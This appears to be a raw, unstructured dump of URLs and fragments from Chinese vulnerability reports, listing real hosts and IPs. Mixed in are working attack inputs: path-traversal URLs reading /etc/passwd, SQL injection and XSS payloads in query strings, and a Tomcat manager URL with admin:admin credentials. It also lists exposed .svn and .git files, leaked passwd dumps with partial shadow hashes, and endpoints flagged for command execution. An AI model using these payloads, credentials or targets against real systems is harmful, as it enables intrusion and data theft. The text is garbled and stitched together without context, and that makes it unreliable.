android:scheme="wkb android:scheme="https android:scheme="about android:scheme="javascript https://mail.cdrcb.com/owa/# http://www.iunmo.com/news/news_show.php?id=33 http://www.55.la/run/user/ajax_email.php http://www.cnoocgh.com.cn/ShipinList.aspx?id=10 http://www.cnoocgh.com.cn/admin/adminlogin.aspx inurl:Usp/?cult=CN inurl:Usp/apabi_usp/ http://site.com/comm/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ http://www.gzweining.gov.cn/Webwsfw/bssh/?subsite=1 http://xpzmjsz.qswtv.com/Webwsfw/bssh/?subsite=1 http://www.jzpsy.cn/Webwsfw/bssh/?subsite=1 http://www.gzuce.com/Webwsfw/bssh/?subsite=1 http://120.27.54.236:8018/Webwsfw/bssh/?subsite=1 http://www.nbhfgzs.com/Webwsfw/bssh/?subsite=1 http://210.40.3.26/Webwsfw/bssh/?subsite=1 http://www.baiweiled.com/Webwsfw/bssh/?subsite=1 http://www.ihxhd.com/Webwsfw/bssh/?subsite=1 http://www.gzfwz.com/Webwsfw/bssh/?subsite=1 http://www.xszqjyw.com/Webwsfw/bssh/?subsite=1 http://www.gzweining.gov.cn/Webwsfw/ztcx/?bh=1 http://xpzmjsz.qswtv.com/Webwsfw/ztcx/?bh=1 http://www.jzpsy.cn/Webwsfw/ztcx/?bh=1 http://www.gzuce.com/Webwsfw/ztcx/?bh=1 http://120.27.54.236:8018/Webwsfw/ztcx/?bh=1 http://www.nbhfgzs.com/Webwsfw/ztcx/?bh=1 http://210.40.3.26/Webwsfw/ztcx/?bh=1 http://www.baiweiled.com/Webwsfw/ztcx/?bh=1 http://www.ihxhd.com/Webwsfw/ztcx/?bh=1 http://westcd.gzu.edu.cn/Webwsfw/ztcx/?bh=1 http://www.gzfwz.com/Webwsfw/ztcx/?bh=1 http://www.xszqjyw.com/Webwsfw/ztcx/?bh=1 http://219.141.242.25/GRETMS_HT/ http://manage.news.fang.com/.svn/entries https://58.42.250.234/ https://www.lngmxx.com/ https://60.13.3.21/ https://120.195.49.238/ https://124.163.249.126/ www.lngmxx.com为例 http://home.www2.fang.com/ http://wooyun.org/bugs/wooyun-2015-0120150 http://shop1.x.com.cn/uu/member.php?act=user_zhanghu#address http://mail.91jinrong.com http://nf.mail.126.com/netfolder/web/search.do?sid=TAnamFQQxGNXovZZqJQQbcoVEYUhapjf&uid=modasoftsz@126.com&host=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E%3Cscript%3Ealert%28%22hello%20Q1940455934%22%29%3C/script%3E&ver=js5&style=9&skin=cute&color=3e9999#userconsentuserconsent http://219.143.8.123:8080/MasterSP-Ad/common/adheader.jsp http://try.mama.cn/wap/index.php?s=/Report/detail/id/71931 https://code.jquery.com/jquery-1.9.1.min.js http://wealth.cloud.cnfol.com/index.php/service/admin/用户名密码任意输入正确验证码,拦截http请求保存为cnfol,使用sqlmap http://www.jianghai.com/mall.aspx?ly=2 http://zhufu2015.mama.cn http://zhufu2015.mama.cn/List/search http://www.duanxin8888.com http://www.zanpu.com/picture/show/14.html color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red weixin.autohome.com.cn/weixin/ReceiveReplyList?memberid=4378064 weixin.autohome.com.cn/weixin/NoticeList?memberid=4378064 weixin.autohome.com.cn/weixin/PrivateletterList?memberid=4378064 weixin.autohome.com.cn/weixin/FansList?memberid=4378064 weixin.autohome.com.cn/weixin/UserInfo?memberid=4378064 http://webmail.now.cn/webmail/login.php http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002%E2%80%98 http://tms1.zte.com.cn/WorkCost/HumanCost/UI/FillMyWorkHourOut.aspx?span=9%27 http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=GwyCPptlk5Oz6g31JvnAqAfjcQvwDe8j http://119.254.108.204:9999 http://db.duowan.com/mt/mobile/cardDetail.html?id=1 http://wooyun.org/bugs/wooyun-2010-056967 http://bbs.dji.com/uc_server/ http://is.gd/XXXXX http://121.10.253.30:8088/ http://218.75.115.150:8080 https://github.com/zhangdaiscott/jeecg/blob/02d82286e4dcc58c75711a15487f691c7702f553/src/main/java/org/jeecgframework/web/system/controller/core/LoginController.java http://m.xiangguo.com/find/password http://www.szredcross.org.cn/Intro/Memorabilia.aspx?typeID=19 http://www.szredcross.org.cn/Intro/MemorabiliaInfo.aspx?typeID=19 http://114.251.68.238/Default.aspx http://220.163.127.89/Default.aspx http://fax.worde.com:81/ http://fax.shnpl.com/ http://115.236.169.250/ http://oa.suid93.com/ http://114.255.248.186/ http://123.127.55.36/ http://183.129.136.54:81/ http://58.22.87.32/ http://120.198.58.22/ http://mail.tz-china.com/ http://125.71.214.121/ http://120.198.58.22/ http://114.242.135.210/ http://180.166.240.99/ https://code.jquery.com/jquery-1.9.1.min.js http://webadmin.kela.cn/ http://management.kela.cn/ http://webadmin.kela.cn/一看已经200多w会员了,增速好快 http://shop.kela.cn/admin.php http://shop.kela.cn/gift.php?c=gift&a=downloads&filename=../../../../../../../../etc/passwd http://zjsx.si.gov.cn/sxnet/存在注入漏洞 http://www.bolaa.com/?author=XXXXXX http://magazine.tcl.com:80/success.aspx?cmd=subscription&serialno=TCLWATCH0001&email=dd@163.com http://sec.chinabyte.com/412/11432412.shtml http://www.tzzx.net//uc_server/control/admin/db.php http://www.tudou.com/viewrecord/info/merge.html?&app=watchcenter&info={"start":0,"rows":50,"needDetail":true,"viewRecords":[{"iid":132457734,"aid":246636,"acode":"","device":0,"viewrecordType":2,"lid":-3,"ct":1434639620658,"done":0,"lvt":27.556}],"selectType":0 http://api.my.letv.com/vcs/list?&pagesize=6&page=1&callback= https://code.jquery.com/jquery-1.9.1.min.js http://MeXss.sinaapp.com/9JSEZf?1434639302 http://l.rcd.iqiyi.com/apis/qiyirc/getrc.php?&cb=%3Cimg%3E&dp=3&only_long=1&terminalId=11 http://l.rcd.iqiyi.com/crossdomain.xml http://jeary.org/flashCSRF http://jeary.org/?post=54 http://pms.zhuzher.com http://pms.zhuzher.com http://passport.game.renren.com/user/info?callback= https://code.jquery.com/jquery-1.9.1.min.js https://passport.tuniu.com/forget/username https://code.jquery.com/jquery-1.9.1.min.js url:http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10021&sex=2 http://www.edingtou.com/invest/investreward?need=3960&max=10100.00&bid=217 http://www.edingtou.com/invest/investreward?bid=116 http://amd-atex.com/ http://amd-atex.com http://qc.light.soufun.com http://bbs.wacai.com/home.php?mod=spacecp'&ac=poke&op=send&uid=3864222&handlekey=propokehk_3864222&infloat=yes&handlekey=a_poke_3864222&inajax=1&ajaxtarget=fwin_content_a_poke_3864222 http://shfy.g.v1.cn/.svn/entries漏洞地址 url:http://219.149.213.11:10000/manager/html user:admin pass:admin http://112.4.228.169:880/ http://www.zwxx.org/tushu/ http://www.dhtfxx.com/tushu/ http://www.gyxsqex.com/tushu/ http://61.175.231.70/dzts/ http://lsxnmxx.js.cn:41516/tushu/ http://222.189.45.162/dzts/ http://112.4.228.169:880/gl_bofangdell.asp?id=11 http://112.4.228.169:880/gl_xiu.asp?id=597752 http://112.4.228.169:880/gl_shan.asp?id=597751 http://112.4.228.169:880/gl_fl_xiu.asp?id=193 http://112.4.228.169:880/gl_fl_shan.asp?id=193 http://112.4.228.169:880/gl_fl_xiu2.asp?id=193 http://112.4.228.169:880/gl_gydell.asp?id=1 http://112.4.228.169:880/gl_lj_shan.asp?id=1 http://112.4.228.169:880/gl_lj_shan2.asp?id=1 http://112.4.228.169:880/gl_pl_shen.asp?id=55 http://112.4.228.169:880/gl_pl_0.asp?id=1 http://112.4.228.169:880/gl_pl_shan.asp?id=1 http://112.4.228.169:880/gl_tj_1.asp?id=1 http://112.4.228.169:880/gl_tj_2.asp?id=1 http://112.4.228.169:880/gl_tz_shan.asp?id=1 http://112.4.228.169:880/gl_tz_shan2.asp?id=1 http://112.4.228.169:880/gl_tz_she.asp?zt=1 http://112.4.228.169:880/gl_tz_xian.asp?id=1 http://112.4.228.169:880/gl_us_shan.asp?id=23 http://112.4.228.169:880/gl_us_shan2.asp?id=23 http://112.4.228.169:880/gl_xiu.asp?id=23 http://112.4.228.169:880/gl_xiu2.asp?id=23 http://112.4.228.169:880/ta_zw2.asp?t1=1 http://112.4.228.169:880/upfile_tu1.ASP?id=1 http://112.4.228.169:880/ta_chakan.asp?id=1 http://112.4.228.169:880/ta_chakan_dell.asp?id=1 http://112.4.228.169:880/ta_list_dell.asp?id=5 http://112.4.228.169:880/ta_list_show.asp?id=5 http://112.4.228.169:880/ta_list_show2.asp?id=5 http://112.4.228.169:880//down.asp?id=1 http://g.sicnu.edu.cn/ http://www.junrongdai.com/zixun.zip http://wooyun.org/bugs/wooyun-2013-036581 http://wooyun.org/bugs/wooyun-2013-039885 http://wooyun.org/bugs/wooyun-2014-048028 android:exported="true android:name="com.tendcloud.appcpa.ReferralReceiver android:name="com.android.vending.INSTALL_REFERRER"/ http://snr.cnsuning.com/snr/redirectLogin.htm?errorCode=err_authentication http://jiankang.58.com/wenda/question/?doctor=594692 http://**.**.**.**/passport-lost.html http://leyou.com.cn/user/findpwstep1 www.91jinrong.com http://bbs.zsebank.com/bbs/bbs_audit_moderator.jsp?fid=1993 http://sqlmap.org http://cms.che.58.com http://www.codoon.com/backend/blacklist https://58.42.250.234/ https://www.lngmxx.com/ https://60.13.3.21/ https://120.195.49.238/ https://124.163.249.126/ www.lngmxx.com为例 admin:x:0:0::/home/admin:/bin/bash http://www.ujipin.com/user.php?act=login http://bbs.dji.com/.git/config http://forum.dji.com/.git/config http://119.254.100.63:8001/cluster http://ah.189.cn/cms/r/cms/ah/default/activity/college.html http://ah.189.cn/service/collegeActivity/verifyNum.action http://voluntaryafc.cmbchina.allyes.com/ http://bank.allyes.com/login.php http://www.caizhimofang.com/member/mmember_newPayPwd.action?sms_vcode=123456&newPassword=aaa3333&re_newPassword=aaa3333 http://www.ikuaishou.com/webservice/exchange.jsp?appkey=1 http://baby.haier.com/baobaoxiu/index.php?c=baby&m=show&babyid=1892&page=41 http://passport.v1.cn/edit/userinfo/uploaduserfacestep2.do http://passport.v1.cn/userupload/5025995.html http://passport.v1.cn/userupload/5025995.exe http://passport.v1.cn/userupload/5025995.exe http://58.118.36.9/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://www.yongzhong.net/cms/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://www.hdac.cn/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://42.121.0.194/cms/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://www.hd123z.bjedu.cn/cms/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://58.118.36.9/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.yongzhong.net/cms/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.hdac.cn/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd http://42.121.0.194/cms/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.hd123z.bjedu.cn/cms/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.wooyun.org/whitehats/我是壮丁 http://210.22.8.98/login.action http://210.22.8.98/user/settingUser.action http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin pulse:x:497:496:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:493:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nagios:x:500:500::/home/nagios:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin webapps:x:501:501::/home/webapps:/bin/bash mysql:x:502:502::/home/mysql:/sbin/nologin ganglia:x:495:492:Ganglia System:/var/lib/ganglia:/sbin/nologin http://mobile.10jqka.com.cn/main/admin/login.php http://gopurchase.haier.com/GOPurchase/ http://gopurchase.haier.com/GOPurchase/page/ http://gopurchase.haier.com/GOPurchase/page/Purchase/DC/BDCPurchaseApplyBill/BDCPurchaseApplyBillList.aspx http://125.88.6.227/invoker/EJBInvokerServlet http://218.28.0.149:8080/ http://redmine.huoyunren.com/ http://121.40.80.83/smnsyh http://ovms.stg.sf-express.com:8888 http://g7s.huoyunren.com/ cn.com.open.mooc/shared_prefs/userinfo.xml中的uid=10000,重新加载程序后,即可登录对应uid账号 http://zt.mama.cn/x2/index.php?c=aosmith&a=index&page2=1&keyWord2= http://dynamic.cloud.vip.xunlei.com站点存在jsonp劫持漏洞,可以获得会话session https://github.com/kisszpy/apps/blob/master/app-user/src/main/filter/dev.properties http://121.40.219.51:8080/ http://117.135.134.240/msg/main.do http://beta.tootoo.cn/.svn/entries http://tg.tootoo.cn/buy_business/.svn/entries http://tg.tootoo.cn/.svn/entries http://v3beta.tootoo.cn/.svn/entries http://user.v3beta.tootoo.cn/.svn/entries http://40cee5.l38.yunpan.cn/lk/cQmsh3bi6J5K2 http://123.59.13.114:8080/signup https://github.com/artistgrammer2015 mongodb://127.0.0.1/node_club_dev index.php/Index/login http://dmfc.tootoo.cn/login_Login_login.do http://biz.go.cn/ http://inventory.tootoo.cn/html/inventory/goodsallocation.html http://sms.tootoo.cn//struts/webconsole.html http://dmfc.tootoo.cn//struts/webconsole.html http://www.acsoft.com.cn/RecommendList WebServiceBase.asmx/GetXMLList WebService.asmx/GetFile WebService.asmx/GetFileContent webconfig:Content=1&fileName=web.config http://bx.xiaotong.com.cn/WS/WebServiceBase.asmx/GetXMLList http://ac.qfkd.com.cn/WS/WebServiceBase.asmx/GetXMLList http://122.224.179.212:8000/WS/WebServiceBase.asmx/GetXMLList http://fy.feishang.cn/WS/WebServiceBase.asmx/GetXMLList http://218.17.152.205:8181/WS/WebServiceBase.asmx/GetXMLList http://nrs.nuctech.com/WS/WebServiceBase.asmx/GetXMLList http://114.247.147.253/WS/WebServiceBase.asmx/GetXMLList http://101.68.67.227:81/WS/WebServiceBase.asmx/GetXMLList http://krs.kirisun.com:8086/WS/WebServiceBase.asmx/GetXMLList http://hkahk.dns0755.net:7900//WS/WebServiceBase.asmx/GetXMLList http://fol.m4tel.com:1700//WS/WebServiceBase.asmx/GetXMLList http://fol.ck-telecom.com:1800/WS/WebServiceBase.asmx/GetXMLList http://ac.isantai.com:9000/WS/WebServiceBase.asmx/GetXMLList http://bx.xiaotong.com.cn/WS/WebService.asmx/GetFile http://ac.qfkd.com.cn/WS/WebService.asmx/GetFile http://122.224.179.212:8000/WS/WebService.asmx/GetFile http://fy.feishang.cn/WS/WebService.asmx/GetFile http://218.17.152.205:8181/WS/WebService.asmx/GetFile http://nrs.nuctech.com/WS/WebService.asmx/GetFile http://114.247.147.253/WS/WebService.asmx/GetFile http://101.68.67.227:81/WS/WebService.asmx/GetFile http://krs.kirisun.com:8086/WS/WebService.asmx/GetFile http://hkahk.dns0755.net:7900//WS/WebService.asmx/GetFile http://fol.m4tel.com:1700//WS/WebService.asmx/GetFile http://fol.ck-telecom.com:1800/WS/WebService.asmx/GetFile http://ac.isantai.com:9000/WS/WebService.asmx/GetFile http://bx.xiaotong.com.cn/WS/WebService.asmx/GetFileContent http://ac.qfkd.com.cn/WS/WebService.asmx/GetFileContent http://122.224.179.212:8000/WS/WebService.asmx/GetFileContent http://fy.feishang.cn/WS/WebService.asmx/GetFileContent http://218.17.152.205:8181/WS/WebService.asmx/GetFileContent http://nrs.nuctech.com/WS/WebService.asmx/GetFileContent http://114.247.147.253/WS/WebService.asmx/GetFileContent http://101.68.67.227:81/WS/WebService.asmx/GetFileContent http://krs.kirisun.com:8086/WS/WebService.asmx/GetFileContent http://hkahk.dns0755.net:7900//WS/WebService.asmx/GetFileContent http://fol.m4tel.com:1700//WS/WebService.asmx/GetFileContent http://fol.ck-telecom.com:1800/WS/WebService.asmx/GetFileContent http://ac.isantai.com:9000/WS/WebService.asmx/GetFileContent http://www.iyoungsh.com/Hotel/view_hotel.aspx?id=46 http://www.89937373.com/Hotel/view_hotel.aspx?id=46 http://www.bl-air.com/hotel/view_hotel.aspx?id=304 http://www.xwtravel.com/hotel/view_hotel.aspx?id=304 http://www.cht-travel.com/hotel/view_hotel.aspx?id=304 index.php/Index/login http://flow.funguide.com.cn:8080/maguscback/ http://www.youzan.com http://bbs.youzan.com/portal.php http://bbs.youzan.com/uc_server/admin.php http://oa.kiiik.com/ http://oa.kiiik.com/tools/SWFUpload/upload.jsp http://oa.kiiik.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/BookRetr.aspx?page=1&KeyVaule=CALLNO&search_Key=%E6%99%AE%E9%80%9A%E6%9F%A5%E8%AF%A2&KeyWord=%E6%9D%A8%E5%8B%87%E4%B8%BB%E7%BC%96 http://**.**.**.**:8088/BookRetr.aspx?KeyWord=%E5%86%AF%E6%99%93%E5%AE%81%2C+%E5%A8%84%E9%AA%8F%E5%BD%AC&search_Key=%E6%99%AE%E9%80%9A%E6%9F%A5%E8%AF%A2&KeyVaule=%E4%BD%9C%E8%80%85 http://**.**.**.**/opac/BookRetr.aspx?Index=6&KeyWord=J228.7&SrchTab=0 http://222.240.176.21 https://github.com/shuniahuang/ele.me/blob/35d2a105385d31224f46a5c9f57df39afce466be/coffee-hr/coffee-hr-impl/coffee-hr-permission-impl/src/main/resources/coffee-hr-common.xml http://www.googosoft.com/ http://211.67.63.14/dxyq/BBSDefault.aspx?id=1 http://210.31.141.73/dxyq/BBSDefault.aspx?id=1 http://211.69.16.30/dxyq/BBSDefault.aspx?id=1 http://211.64.120.53/dxyq/BBSDefault.aspx?id=1 http://211.67.112.115/dxyq/BBSDefault.aspx?id=1 http://cb.cnki.net/index.aspx http://cb.cnki.net/admin/adminLogin.aspx http://cb.cnki.net/admin/JournalMngr.aspx www.91dk.com www.hero.bbs.9wee.com www.9wee.com www.j1.sg.9wee.com www.s133.hero.9wee.com www.97.sese.cmhero.bbs.9wee.com www.s45.sg.9wee.com www.s55.sg.9wee.com www.cs.9wee.com www1.9wee.com www.s13.hero.9wee.com www.265610.9wee.com www.9.9wee.com https://122.226.206.81:10000/ http://www.sy.e21.edu.cn/upload_files/ http://st.renren.com/activity/71056 http://121.201.7.202:8082/governance/addresses http://117.41.251.138/jxjs/ http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985&reportType=FB040 http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985 http://fund.csrc.gov.cn/web/list_net.daily_report?fundCode=000985 http://61.155.106.135:8080 http://61.155.106.135:8080/useredit.php http://11x5.js-lottery.com:8080/jscpcx.php http://xuanwu.changba.com/bbs.rar http://localhost/reset?token=202cb962ac59075b964b07152d234b70 http://localhost/reset?token[0]=like&token[1]=2%25 http://www.ohkj.com/ui/Innovation_Enterprise.aspx?Type=1&T=%E9%AB%98%E6%96%B0%E6%8A%80%E6%9C%AF%E4%BC%81%EF%BF%BD?SortID=16 http://www.onefoundation.cn/phpinfo.php http://erpn.fang.com/ erpn.fang.com/SystemManage/News/NewsDetail.aspx?newsid=151 erpn.fang.com/SystemManage/News/NewsDetail.aspx?newsid=151 http://pfxzsp.spb.gov.cn/generalservice/loginlog/downLoadAction.do http://www.smm.cn/.svn/entries http://trend.smm.cn/.svn/entries http://f.smm.cn/.svn/entries http://b.smm.cn/.svn/entries url:http://fax.sfn.cn/feat/Account/List.aspx http://bbl.changyou.com/.svn/entries http://my.youboy.com/checkEmail.do?token=516e9314ff048dac1c4e1416c9c0b1c761e7d916680449737f3c53c25746ea70&usid=1951126 http://www.dajiashuo.com/HelpUserRule.aspx?show=11 test:888888 http://www.ichengyo.com http://59.173.243.45:8000/general/login/index.php se://myfavor/存在一处XSS,可以读取用户访问的网页数据。 http://stream.gionee.com/.git/config http://sync.gionee.com/.git/config http://id.gionee.com/.git/config http://dianpu.fang.com/ http://rszp.cqu.edu.cn/zpsys/index.jsp http://rszp.cqu.edu.cn/zpsys/uploadfile/file/20707__0065m5m12h-xxk6rg-iadlkswk-1-ib02oamb-x.jsp http://wiki.changba.com:8090 http://v.changba.com:8888/common/config.inc.php.bak http://v.changba.com:8888/common/config.inc.php1 http://59.151.31.233:8888/common/config.inc.php.bak http://59.151.31.233:8888/common/config.inc.php1 http://v.changba.com:8888/crontab/.svn/entries http://v.changba.com:808/login/.svn/entries http://basic.open.com.cn/learnbar/user/updateName.json http://218.91.46.102:8080/web/loginaction!logout.action http://www.pptv.com/ http://api.usergrowth.pptv.com/getUserBilling?username=**********&format=jsonp&cb=jQuery18306921253258079285_1434780200316&token=dp2ozX7d***************XEA%0D%0A&_=1434780201259 http://**.**.**.**/tzptweb/webpages/all_search_list_page.aspx http://**.**.**.**//webpages/all_search_list_page.aspx http://116.255.135.35:8082/finance_glx/monitor/resource_form.jsp?village_dm=0110004 http://111.12.148.194:7005/finance_qhld/monitor/resource_form.jsp?village_dm=0110004 http://222.185.126.83:8081/finance28/monitor/resource_form.jsp?village_dm=0110008 http://124.163.225.208:8082/finance13/cmp/monitor/resource_form.jsp?village_dm=0111010 http://61.178.243.126:8083/finance13N/cmp/monitor/resource_form.jsp?village_dm=0103022 http://115.182.12.9/security/login.hlt http://27.17.18.107:8080/GTJY_HB/resslist_page.action;jsessionid=00C7D1D1D55692B706D448BFAA5664E6?currentPage=2存在命令执行漏洞 http://122.224.213.103:8080/caisyys/login/login.action存在命令执行漏洞 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin tomcat:x:500:500::/home/tomcat:/bin/bash sshh:x:501:501::/home/sshh:/bin/bash super:x:502:502::/home/super:/bin/bash wJY0:15885:0:99999:7 BYdMARz5EkyZ1:15949:30:30:7 hqw8c90qAHQ0:15949:30:30:7 encap:Ethernet D4:85:64:5B:C1:DE addr:122.224.213.103 Bcast:122.224.213.127 Mask:255.255.255.192 d685:64ff:fe5b:c1de/64 Scope:Link MTU:1500 packets:310007145 packets:56120097 txqueuelen:1000 http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname=test&passwd=test&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212 coding:utf-8-*- https://59.33.255.14/ http://www.nbctsg.com/lvyou_info.php?id=128 http://www.nbctsg.com/login.php http://www.hbnsyh.com/show.asp?id=1005 http://sqlmap.org http://www.gzeducms.cn/login.jsp http://video.grandcloud.cn//index.php?m=poster&c=index&a=poster_click&id=1 http://web.grandcloud.cn/index.php?m=poster&c=index&a=poster_click&id=1 http://42.62.65.124:8080/renewableEnergy/login_login.action存在命令执行漏洞 URL:http://b2bi.gome.com.cn/security/login.hlt http://www.bjzq.com.cn/dpfx/ShowClass.asp?ClassID=9 http://www.bjzq.com.cn/hsgs/ShowClass.asp?ClassID=32 http://www.bjzq.com.cn/hyzq/ShowClass.asp?ClassID=26 http://www.bjzq.com.cn/syjq/ShowClass.asp?ClassID=14 http://www.bjzq.com.cn/realty/ShowClass.asp?ClassID=36 http://www.bjzq.com.cn/Soft/ShowClass.asp?ClassID=24 http://www.bjzq.com.cn/JS/index.asp?action=addfang http://www.bjzq.com.cn/qihuo/ShowClass.asp?ClassID=46 http://www.bjzq.com.cn/fund/ShowClass.asp?ClassID=53 http://115.28.233.30:7921/web/users/depttree.php?deptid=&level=0&deptname= http://1.93.4.40:89/web/users/depttree.php?deptid=&level=0&deptname= http://www.bj-tofi.com:89/web/users/depttree.php?deptid=&level=0&deptname= http://218.89.3.21:89/web/users/depttree.php?deptid=&level=0&deptname= http://121.199.29.166:89/users/depttree.php?deptid=&level=0&deptname= http://122.200.76.233/web/users/depttree.php?deptid=&level=0&deptname= http://115.28.233.30:7921/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://218.89.3.21:89/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://www.bj-tofi.com:89/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://122.200.76.233/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://1.93.4.40:89/web/conferences/journal.php?confid=732453&page=2&topic=SMB http://121.199.29.166:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://122.200.76.233/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://www.bj-tofi.com:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://218.89.3.21:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://115.28.233.30:7921/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://1.93.4.40:89/web/monitor/depttree.php?parentid=&level=0&deptname=&ran=1434786772 http://121.199.29.166:89/web/department/depttree.php?parentid=1 http://122.200.76.233/web/department/depttree.php?parentid=1 http://www.bj-tofi.com:89/web/department/depttree.php?parentid=1 http://218.89.3.21:89/web/department/depttree.php?parentid=1 http://115.28.233.30:7921/web/department/depttree.php?parentid=1 http://1.93.4.40:89/web/department/depttree.php?parentid=1 http://121.199.29.166:89/web/dept.php?lan=zh_cn&deptcode=root http://122.200.76.233/web/dept.php?lan=zh_cn&deptcode=root http://www.bj-tofi.com:89/web/dept.php?lan=zh_cn&deptcode=root http://218.89.3.21:89/web/dept.php?lan=zh_cn&deptcode=root http://115.28.233.30:7921/web/dept.php?lan=zh_cn&deptcode=root http://1.93.4.40:89/web/dept.php?lan=zh_cn&deptcode=root http://oa.sqgf.com/ http://www.sdbys.cn/index_.html http://ntc.org.cn/e/action/ShowInfo.php?classid=70&id=1 http://k.thea.cn/upload_class/camera.swf?inajax=1&appid=1&agent=83271fd20a6687ffcd0d1b6f7ad13cdd&ucapi=http%3A%2F%2Fk.thea.cn%2Fupload_class&input=uid%3D2620600&avatartype=virtual http://www.secoo.com/ qqexmail:http://mail.secoo.com/ http://www.jwss.cc/?q=Powered%20by%20FineCMS%E5%85%8D%E8%B4%B9%E7%89%88&pn=100 http://www.luyoutu.com/ http://www.qianjin998.com/ http://dery.cn/ http://www.xiaomixifan.cn/ http://www.yyxly.com/ http://mylhealth.com/ http://*.ganji.com/logs/error.log http://*.ganji.com/logs/access.log www.ganji.com http://www.ganji.com/pub/pub.php?a 